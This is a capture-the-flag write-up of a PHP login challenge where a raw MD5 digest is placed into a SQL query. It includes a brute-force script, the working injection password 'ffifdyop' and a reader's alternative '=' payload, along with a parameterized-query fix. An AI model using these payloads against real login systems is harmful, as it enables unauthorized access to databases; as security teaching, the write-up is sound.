Leet More 2010 Oh Those Admins! writeup

Category: web-vuln?!

http://vos.uz/oh_those_admins/

http://vos.uz/oh_those_admins/index.php.txt

The PHP script takes a ‘password’ as input, calculates its raw (binary) MD5 and performs the SQL query:

SELECT login FROM admins WHERE password = '$raw_md5'

and if the query returns anything, it gives us the full list of admins.

A raw MD5 can contain any byte, and the script puts those bytes into the query as is: it’s an SQL injection vulnerability.
What we have to do is brute-force a password whose raw MD5 contains ‘or’1, so that the query looks like

SELECT login FROM admins WHERE password = '<trash>'or'1<shit>'

This returns all the rows, because MySQL converts ‘1<shit>’ from string to int (1) and then to boolean true.
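The bug and its fix side by side, as an added PHP example that is not the challenge’s index.php (which I have not reproduced here). It assumes a PDO connection to the `admins(login, password)` table described above and, in the hardened variant, that the column stores the hex digest rather than raw bytes.

```php
<?php
// VULNERABLE: the raw (binary) digest is spliced straight into the SQL
// string. Any digest containing byte 0x27 (') closes the literal, so a
// password whose digest reads 'or'6<trash> makes the WHERE clause true
// for every row. This mirrors the behaviour described in the write-up.
function admins_vulnerable(PDO $pdo, string $password): array
{
    $raw_md5 = md5($password, true);
    $sql = "SELECT login FROM admins WHERE password = '$raw_md5'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// HARDENED: the digest never becomes part of the SQL text. It is bound
// as a parameter, so a quote byte is just data to the server, and it is
// passed as 32 hex characters so no binary ends up in the column.
// (md5 is kept only to mirror the challenge; real code should store
// password_hash() output and check it with password_verify().)
function admins_hardened(PDO $pdo, string $password): array
{
    $hex_md5 = md5($password);          // hex digest, never contains 0x27
    $stmt = $pdo->prepare('SELECT login FROM admins WHERE password = ?');
    $stmt->execute([$hex_md5]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Offline check, no database needed: does a candidate password produce
// a digest that would break out of the quoted literal above?
function digest_breaks_out(string $password): bool
{
    return stripos(md5($password, true), "'or'") !== false;
}
?>
```

With the password from this write-up, `digest_breaks_out('ffifdyop')` is true, while the same input passed to `admins_hardened()` is compared as an ordinary 32-character string.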

Math tells us there will be a usable hash every 256 ^ 5 / 11 = 99955602525 hashed passwords. At 5kk (5 million) hashes per second, you get a solution in ~5.5 hours. That’s not very optimistic, so to speed up the brute-force we can use different cases of ‘or’: ‘or’, ‘oR’, ‘Or’ and ‘OR’, plus its synonym ‘||’. Moreover, we can use all the digits 1..9 instead of just ‘1’. This gives a 45 times faster solution: a usable hash every 5 min.

I used a modified version of John the Ripper for the brute-force, but even a PHP script will give you what you need in reasonable time:

<?php
// Try candidate passwords (here simply the integers 0, 1, 2, ...) and
// report every one whose raw MD5 contains the byte sequence 'or'
// (quote, o, r, quote). stripos() is case-insensitive, so 'OR', 'Or'
// and 'oR' are caught too. The digest is printed as hex because the
// raw bytes are not readable on a terminal.
for ($i = 0;;) {
    for ($c = 0; $c < 1000000; $c++, $i++) {
        $raw = md5($i, true);
        if (stripos($raw, "'or'") !== false) {
            echo "\nmd5($i) = " . bin2hex($raw) . "\n";
        }
    }
    echo "."; // progress marker: one dot per million hashes
}
?>

I found a password: ffifdyop, with hash 276f722736c95d99e921722cf9ed621c, whose raw form is ‘or’6<trash>.
After logging in, we see the real admin’s (binary) password hash, in hex: 00071cc0720abd73f61a291224f248d6

Googling for it, or brute-forcing again, we get the answer: 13376843.



    Charles Fol on October 31, 2010 at 21:08:

    Hey.

    Actually, using a hash that contains '=' will do the job.

    The query becomes:
    SELECT login FROM admins WHERE password=''=''
    which works.

    Explanation for 'a'='b'='c' -> 1:
    'a'='b'='c' is evaluated in this order: ('a'='b')='c'.

    As 'a' != 'b', 'a'='b' gives us 0, and that leads us to the final comparison 0='c'. Then MySQL tries to cast 'c' as a number, and finds 0.
    The comparison is now 0=0, which finally gives us 1.

    Thanks for that sweet CTF LeetMore :) see you next year.
